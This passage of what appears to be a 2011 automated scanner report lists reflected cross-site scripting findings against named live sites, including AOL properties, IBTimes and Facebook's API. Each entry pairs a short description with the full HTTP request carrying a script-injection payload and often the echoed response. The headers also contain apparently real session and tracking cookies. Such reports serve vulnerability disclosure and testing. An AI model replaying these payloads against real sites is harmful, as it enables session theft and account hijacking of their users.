The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c6a5"><script>alert(1)</script>8d254a4718e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/dailyfinance?8c6a5"><script>alert(1)</script>8d254a4718e=1 HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bdddb'><script>alert(1)</script>9c1db18b1e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/engadgetbdddb'><script>alert(1)</script>9c1db18b1e0 HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.28. http://advertising.aol.com/brands/engadget [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertising.aol.com
Path:
/brands/engadget
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d672"><script>alert(1)</script>3b70e9dcf4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/engadget?9d672"><script>alert(1)</script>3b70e9dcf4e=1 HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.29. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c3c"-alert(1)-"489c5415bae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1 HTTP/1.1 Host: africa.ibtimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:19:59 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=dc543bc55452b21506b39f10b8963776; expires=Sun, 06 Feb 2011 22:19:59 GMT; path=/ Expires: Fri, 04 Aug 1978 12:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 56763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <script type="text/javascript"> var exURL = escape("http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?49c3c"-alert(1)-"489c5415bae=1"); var exHed = encodeURIComponent("Google Grants $100 Mln Equity to Eric Schmidt"); var exDek = encodeURIComponent("Search giant Google said it will award $100 million worth of equity to Eri ...[SNIP]...
1.30. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce9ce"><script>alert(1)</script>4fa7211aef3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1 HTTP/1.1 Host: africa.ibtimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:19:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=b470a06fa0e8e476a5bf0dab6d10a9ed; expires=Sun, 06 Feb 2011 22:19:56 GMT; path=/ Expires: Fri, 04 Aug 1978 12:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 56853
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]... <input type="hidden" id="urlhome" value="http://www.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?ce9ce"><script>alert(1)</script>4fa7211aef3=1"> ...[SNIP]...
1.31. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6330e'-alert(1)-'bdd8bdef0e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm?6330e'-alert(1)-'bdd8bdef0e3=1 HTTP/1.1 Host: africa.ibtimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:20:01 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=8dc726c62f556b216ff22cbd19d8797c; expires=Sun, 06 Feb 2011 22:20:01 GMT; path=/ Expires: Fri, 04 Aug 1978 12:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-tran Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 56763
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 7afda<script>alert(1)</script>150cf4dbb8a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/aol/mbox/standard?mboxHost=travel.aol.com&mboxSession=1297021706926-216891&mboxPage=1297021706926-216891&screenHeight=1200&screenWidth=1920&browserWidth=1001&browserHeight=1031&browserTimeOffset=-360&colorDepth=16&mboxCount=1&dept=Main&subDept=Travel%20Main&pageName=Travel%20Main&mbox=AOL_Travel_Global7afda<script>alert(1)</script>150cf4dbb8a&mboxId=0&mboxTime=1297000108866&mboxURL=http%3A%2F%2Ftravel.aol.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1 Host: aol.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://travel.aol.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 213 Date: Sun, 06 Feb 2011 19:51:18 GMT Server: Test & Target
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5751e<script>alert(1)</script>0a7121bf666 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666&callback=bizo_callback HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Sun, 06 Feb 2011 20:59:22 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 84 Connection: keep-alive
Unknown API key: (r9t72482usanbp6sphprhvun5751e<script>alert(1)</script>0a7121bf666)
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload a9d50<script>alert(1)</script>8356ded867a was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun&callback=bizo_callbacka9d50<script>alert(1)</script>8356ded867a HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Date: Sun, 06 Feb 2011 20:59:25 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KerMh8N4wnRRaj5XcunNcMDa7Re6IGD4lFp4YH8CH6lnAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtTclMip9ek9khgmm0D5jgFUisEVUJBxdqAyBeojO7uEzb2p0Yl2wVR6WyPhWWt9YcKJ0ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 203 Connection: keep-alive
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 8d0f9<a>df4d06c17ec was submitted in the name parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFG&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D8d0f9<a>df4d06c17ec&mode=set HTTP/1.1 Host: api.dimestore.com Proxy-Connection: keep-alive Referer: http://content.dimestore.com/prod/swf/V3player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""
The value of the name request parameter is copied into the XML document as plain text between tags. The payload 8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16 was submitted in the name parameter. This input was echoed as 8e4e5<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>73605709c16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /viapi?action=cookie&name=IBogOiIBKgExLQYjCzIdPRcaNwEiEj0rfkJ2c1E%253D8e4e5<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>73605709c16&mode=get HTTP/1.1 Host: api.dimestore.com Proxy-Connection: keep-alive Referer: http://content.dimestore.com/prod/swf/V3player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Sun, 06 Feb 2011 20:25:03 GMT Content-Type: text/xml Connection: keep-alive Content-Length: 244
The value of the value request parameter is copied into the XML document as plain text between tags. The payload a2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9 was submitted in the value parameter. This input was echoed as a2b55<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>43cd31f02e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /viapi?action=cookie&value=EyADRWJEY0NpdVl%252BSWFGa2b55<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>43cd31f02e9&name=IgUsFjsrORc3NyILDBo6HychGw%253D%253D&mode=set HTTP/1.1 Host: api.dimestore.com Proxy-Connection: keep-alive Referer: http://content.dimestore.com/prod/swf/V3player.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: respondentId=ec3090ffba90412a8149082ce035a177; respondentEmail=""
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload ee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31 was submitted in the method parameter. This input was echoed as ee046<img src=a onerror=alert(1)>f2ed30b6f31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?format=json&method=links.getStatsee046<img%20src%3da%20onerror%3dalert(1)>f2ed30b6f31&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D1&callback=aptureJsonCallback0 HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Type: text/javascript;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache X-Cnection: close Date: Sun, 06 Feb 2011 20:38:25 GMT Content-Length: 481
The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 9cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc was submitted in the urls parameter. This input was echoed as 9cac7<img src=a onerror=alert(1)>428383ff7dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?format=json&method=links.getStats&urls=http%253A%252F%252Fwww.electronista.com%252Farticles%252F11%252F02%252F04%252Fsales.of.glasses.free.3d.tvs.weaker.than.expected%252F%253Fe4c13%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ec3b351ab889%253D19cac7<img%20src%3da%20onerror%3dalert(1)>428383ff7dc&callback=aptureJsonCallback0 HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsmallbusiness.aol.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fsmallbusiness.aol.com%252F%253F998a2%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9cd08062e59%253D1%26extra_2%3DUS
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=120 Content-Type: text/javascript;charset=utf-8 Expires: Sun, 06 Feb 2011 12:40:37 -0800 Pragma: X-Cnection: close Date: Sun, 06 Feb 2011 20:38:37 GMT Content-Length: 642
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c96be<script>alert(1)</script>92b20bf3bf8 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /auth/getToken?devId=ao1atoKNL9675h&attributes=displayName,profileUrl,pictureUrl&f=json&c=jsonp1297023979135c96be<script>alert(1)</script>92b20bf3bf8 HTTP/1.1 Host: api.screenname.aol.com Proxy-Connection: keep-alive Referer: http://www.aolhealth.com/?efb95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2a680ac5448=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:25:23 GMT Set-Cookie: JSESSIONID=6A020E7511383C0E38BF9DB8FCE3D07B; Path=/auth Set-Cookie: OASC=diAxLjAgayAwIHlaWi9nVVBheFN2ZUJHcFZEYUNtcjFUNVhkWT0%3D-SSQdmqasJXW7AratTMW0Ebo0fFONkRgKp3Nz8AP0G2hDlYt5hoCp0D9upWW2a1M1tALOCnjOZLBFwhvg5agWxYIVALonDKGqbQQsQOEEfCl4FW0AirWAhSnABCxmMQEil%2FSriE29mS1hitvGyQTxzNUbM7yoamEoiPR1QMeJ9Sf8QCgk%2FH84DuWWFf2GJBVS; Path=/; HTTPOnly Pragma: No-cache Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/json;charset=UTF-8 Content-Language: en-US P3P: CP="PHY ONL PRE STA CURi OUR IND" Content-Length: 130
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3298<script>alert(1)</script>b6048824017 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /url_info.jsonc?url=http%3A%2F%2Fwww.electronista.com%2Farticles%2F11%2F02%2F04%2Fsales.of.glasses.free.3d.tvs.weaker.than.expected%2F%3Fe4c13%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec3b351ab889%3D1&callback=aptureJsonCallback1f3298<script>alert(1)</script>b6048824017 HTTP/1.1 Host: api.tweetmeme.com Proxy-Connection: keep-alive Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-724637325-1295907700201; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983; user_unique_ident=4d4300485cccb8.88856407-57c11f7a933564d3f62b1bb71b01e19d
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 06 Feb 2011 20:38:11 GMT Content-Type: text/html Connection: close P3P: CP="CAO PSA" X-RateLimit-Limit: 400 X-RateLimit-Remaining: 374 X-Served-By: h04 Content-Length: 117
aptureJsonCallback1f3298<script>alert(1)</script>b6048824017({"status":"failure","comment":"unable to resolve URL"});
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload ac334<script>alert(1)</script>4007ecfe708 was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionac334<script>alert(1)</script>4007ecfe708&n=ar_int_p85001580&1297025046004 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C
Response
